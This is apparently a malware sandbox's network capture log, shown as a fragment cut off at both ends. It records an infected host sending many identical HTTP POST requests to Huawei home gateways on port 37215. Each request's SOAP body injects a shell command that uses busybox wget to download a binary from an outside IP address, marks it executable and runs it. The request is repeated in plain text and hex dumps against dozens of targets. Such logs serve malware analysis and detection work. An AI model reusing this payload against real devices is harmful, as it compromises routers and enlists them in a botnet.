78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1379192.168.2.1555460197.137.249.10437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731831074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1380192.168.2.1533260197.127.130.5037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731832027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1381192.168.2.1551134197.120.143.12337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731846094 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1382192.168.2.1533018197.71.163.17837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731865883 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1383192.168.2.1546502197.192.160.24137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731889009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1384192.168.2.1540398197.82.85.11037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731909037 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1385192.168.2.1552440197.123.91.4337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731930017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1386192.168.2.1535046197.40.165.11737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731966972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1387192.168.2.1541248197.131.97.5637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.731970072 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1388192.168.2.1553896197.68.59.6737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732002020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1389192.168.2.1556742197.46.206.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732038021 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
